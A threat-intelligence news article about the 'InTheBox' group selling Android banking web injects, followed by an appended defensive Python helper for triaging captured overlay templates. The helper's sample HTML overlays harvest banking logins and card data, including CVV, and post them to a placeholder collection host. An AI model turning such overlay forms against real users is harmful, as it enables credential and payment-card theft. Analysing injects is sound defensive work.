A Russian threat actor has been stocking a Tor-based online store with ready-to-sell web injects that work with different Android banking malware, researchers found.
The web injects are offered at low prices with attractive discounts. Cyble Research and Intelligence Labs (CRIL) identified the emerging threat group on Russian hacking forums, explicitly targeting banking applications.
The research team has been closely monitoring the actions of a notorious threat actor/group known as “InTheBox”.
Lurking in the shadows of a Russian language cybercrime forum, this group has expanded its reach with a sinister arsenal of web injects. Housed in their Tor-based online shop, these ready-to-use web injects can be paired with various Android banking malware and are offered at bargain prices with alluring discounts.
What is ‘InTheBox’?
“InTheBox” is a known threat actor or group in the cybercrime community. According to the CRIL report, the group is primarily active on a Russian language cybercrime forum and is known for offering web injects for sale through its Tor-based online shop.
These web injects are designed to target retail banking, mobile payment services, cryptocurrency exchanges, and mobile e-commerce applications of major organizations across various countries.
Since February 2020, the infamous group “InTheBox” has made a name for itself as a verified seller of Android mobile application web injects.
The group runs a Tor-based online shop that offers a seamless shopping experience for those seeking to purchase web injects. With enticing discounts and an effortless purchasing process, it’s no wonder that “InTheBox” has become popular among those looking to inflict harm on the digital world.
While access to the Tor website previously required only a free registration, “InTheBox” has now upped the ante, requiring a one-time fee for entry. Despite the added barrier, it’s clear that “InTheBox” remains a dangerous force to be reckoned with in the world of cybercrime.
How do Android web injections work?
An Android web inject is a custom-made module crafted to harvest sensitive information, and it is the perfect disguise for banking malware. Victims are lured into a false sense of security with a deceptive overlay interface mimicking a legitimate mobile application.
The web inject acts like a sly thief, silently slipping into the shadows and snatching away valuable credentials and sensitive data. This attack vector is reminiscent of the age-old Man-in-the-Browser (MITB) attack, a constant threat to those who roam the digital landscape.
“InTheBox” has taken the cybercrime world by storm, shaking up the market with their newly reduced prices on individual web injects. What was once a costly investment of $50 can now be had for a mere $30. And for those looking for a truly personalized touch, “InTheBox” offers custom web injection development, tailoring their deadly wares to fit the specific needs of any banking malware bot.
Starting with a targeted assault on organizations in the US, Australia, and South America, “InTheBox” has broadened its scope, now casting its net over 44 countries. Their relentless pursuit of power and profit knows no bounds, making them a force to be reckoned with in the digital world.
The web injection, disguised as a benign overlay interface, coaxes unsuspecting users into entering their precious mobile banking credentials, such as user ID, password, and mobile number. However, this is just the tip of the iceberg, as the real damage is yet to come.
A second overlay interface pops up, tricking the user into handing over their credit card information, including the number, expiry date, and CVV code – information that may not even be necessary for the legitimate app.
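As an added illustration (not code from the CRIL report or from the InTheBox kit), the following Python triage helper shows how an analyst might classify a captured overlay template by the fields it harvests: the login stage described above versus the second, card-data stage, plus the form target the stolen data is posted to. The field names it matches and the c2.example.invalid host in the sample templates are constructed placeholders.

```python
from html.parser import HTMLParser
import re

# Normalised field names (letters/digits only) for the two harvesting stages
# the report describes: banking login first, then payment card data.
LOGIN_FIELDS = {"userid", "username", "login", "password", "pass", "mobile", "phone", "msisdn"}
CARD_FIELDS = {"cardnumber", "pan", "expiry", "expdate", "cvv", "cvc", "cvv2"}
CVV_FIELDS = {"cvv", "cvc", "cvv2"}


class InjectFormParser(HTMLParser):
    """Collects form action URLs and input field names from overlay HTML."""

    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input":
            name = a.get("name") or a.get("id") or ""
            if name:
                self.fields.append(name)


def triage_inject(html: str) -> dict:
    """Classify an overlay template by the data it tries to harvest."""
    parser = InjectFormParser()
    parser.feed(html)
    # Strip separators so card_number, card-number and cardNumber all match.
    norm = {re.sub(r"[^a-z0-9]", "", f.lower()) for f in parser.fields}
    login = sorted(norm & LOGIN_FIELDS)
    card = sorted(norm & CARD_FIELDS)
    return {
        "stage": "card" if card else "login" if login else "unknown",
        "login_fields": login,
        "card_fields": card,
        # CVV is a strong tell: the legitimate app may not even need it.
        "asks_cvv": bool(norm & CVV_FIELDS),
        "exfil_targets": parser.actions,
    }


# Constructed sample overlays (not real inject code); the host is a placeholder.
STAGE1_HTML = ('<form action="https://c2.example.invalid/gate.php"><input name="userId">'
               '<input type="password" name="password"><input name="mobile"></form>')
STAGE2_HTML = ('<form action="https://c2.example.invalid/gate.php"><input name="card_number">'
               '<input name="expiry"><input name="cvv"></form>')
```

Running `triage_inject` over both samples labels the first as the login stage and the second as the card stage with `asks_cvv` set, and reports the same collection endpoint for each.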